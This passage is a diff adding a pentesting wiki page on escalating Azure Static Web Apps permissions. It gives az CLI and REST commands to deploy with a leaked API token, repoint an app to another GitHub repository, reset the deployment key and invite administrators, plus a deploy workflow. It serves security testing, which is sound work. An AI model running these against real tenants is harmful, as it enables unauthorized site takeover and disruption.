you want to deploy) and run `cd react-basic`. +2. Change the code you want to deploy +3. Deploy it running (Remember to change the ``): + +```bash +docker run --rm -v $(pwd):/mnt mcr.microsoft.com/appsvc/staticappsclient:stable INPUT_AZURE_STATIC_WEB_APPS_API_TOKEN= INPUT_APP_LOCATION="/mnt" INPUT_API_LOCATION="" INPUT_OUTPUT_LOCATION="build" /bin/staticsites/StaticSitesClient upload --verbose +``` + +>[!WARNING] +> Even if you have the token you won't be able to deploy the app if the **Deployment Authorization Policy** is set to **Github**. For using the token you will need the permission `Microsoft.Web/staticSites/write` to change the deployment method to use th APi token. + +### Microsoft.Web/staticSites/write + +With this permission it's possible to **change the source of the static web app to a different Github repository**, however, it won't be automatically provisioned as this must be done from a Github Action. + +However, if the **Deployment Authotization Policy** is set to **Github**, it's possible to **update the app from the new source repository!**. + +In case the **Deployment Authorization Policy** is not set to Github, you can change it with the same permission `Microsoft.Web/staticSites/write`. + +```bash +# Change the source to a different Github repository +az staticwebapp update --name my-first-static-web-app --resource-group Resource_Group_1 --source https://github.com/carlospolop/my-first-static-web-app -b main + +# Update the deployment method to Github +az rest --method PATCH \ +--url "https://management.azure.com/subscriptions/>/resourceGroups//providers/Microsoft.Web/staticSites/?api-version=2022-09-01" \ +--headers 'Content-Type=application/json' \ +--body '{ + "properties": { + "allowConfigFileUpdates": true, + "stagingEnvironmentPolicy": "Enabled", + "buildProperties": { + "appLocation": "/", + "apiLocation": "", + "appArtifactLocation": "build" + }, + "deploymentAuthPolicy": "GitHub", + "repositoryToken": "" # az rest --method GET --url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01" + } +}' +``` + +Example Github Action to deploy the app: + +```yaml +name: Azure Static Web Apps CI/CD + +on: + push: + branches: + - main + pull_request: + types: [opened, synchronize, reopened, closed] + branches: + - main + +jobs: + build_and_deploy_job: + if: github.event_name == 'push' || (github.event_name == 'pull_request' && github.event.action != 'closed') + runs-on: ubuntu-latest + name: Build and Deploy Job + permissions: + id-token: write + contents: read + steps: + - uses: actions/checkout@v3 + with: + submodules: true + lfs: false + - name: Install OIDC Client from Core Package + run: npm install @actions/core@1.6.0 @actions/http-client + - name: Get Id Token + uses: actions/github-script@v6 + id: idtoken + with: + script: | + const coredemo = require('@actions/core') + return await coredemo.getIDToken() + result-encoding: string + - name: Build And Deploy + id: builddeploy + uses: Azure/static-web-apps-deploy@v1 + with: + azure_static_web_apps_api_token: "12345cbb198a77a092ff885782a62a15d5aef5e3654cac1234509ab54547270704-4140ccee-e04f-424f-b4ca-3d4dd123459c00f0702071d12345" # A valid formatted token is needed although it won't be used for authentication + action: "upload" + ###### Repository/Build Configurations - These values can be configured to match your app requirements. ###### + # For more information regarding Static Web App workflow configurations, please visit: https://aka.ms/swaworkflowconfig + app_location: "/" # App source code path + api_location: "" # Api source code path - optional + output_location: "build" # Built app content directory - optional + github_id_token: ${{ steps.idtoken.outputs.result }} + ###### End of Repository/Build Configurations ###### + + close_pull_request_job: + if: github.event_name == 'pull_request' && github.event.action == 'closed' + runs-on: ubuntu-latest + name: Close Pull Request Job + steps: + - name: Close Pull Request + id: closepullrequest + uses: Azure/static-web-apps-deploy@v1 + with: + action: "close" +``` + +### Microsoft.Web/staticSites/resetapikey/action + +With this permision it's possible to **reset the API key of the static web app** potentially DoSing the workflows that automatically deploy the app. + +```bash +az rest --method POST \ + --url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//resetapikey?api-version=2019-08-01" +``` + +### Microsoft.Web/staticSites/createUserInvitation/action + +This permission allows to **create an invitation to a user** to access protected paths inside a static web app ith a specific given role. + +The login is located in a path such as `/.auth/login/github` for github or `/.auth/login/aad` for Entra ID and a user can be invited with the following command: + +```bash +az staticwebapp users invite \ + --authentication-provider Github # AAD, Facebook, GitHub, Google, Twitter \ + --domain mango-beach-071d9340f.4.azurestaticapps.net # Domain of the app \ + --invitation-expiration-in-hours 168 # 7 days is max \ + --name my-first-static-web-app # Name of the app\ + --roles "contributor,administrator" # Comma sepparated list of roles\ + --user-details username # Github username in this case\ + --resource-group Resource_Group_1 # Resource group of the app +``` + +### Pull Requests + +By default Pull Requests from a branch in the same repo will be automatically compiled and build in a staging environment. This could be abused by an attacker with write access over the repo but without being able to bypass branch protections of the production branch (usually `main`) to **deploy a malicious version of the app** in the statagging URL. + +The staging URL has this format: `https://-..` like: `https://ambitious-plant-0f764e00f-2.eastus2.4.azurestaticapps.net` + +> [!TIP] +> Note that by default external PRs won't run workflows unless they have merged at least 1 PR into the repository. An attacker could send a valid PR to the repo and **then send a malicious PR** to the repo to deploy the malicious app in the stagging environment. HOWEVER, there is an unexpected protection, the default Github Action to deploy into the static web app need access to the secret containing the deployment token (like `secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_AMBITIOUS_PLANT_0F764E00F`) eve if the deployment is done with the IDToken. This means that because an external PR won't have access to this secret and an external PR cannot change the Workflow to place here an arbitrary token without a PR getting accepted, **this attack won't really work**. + + +{{#include ../../../banners/hacktricks-training.md}} +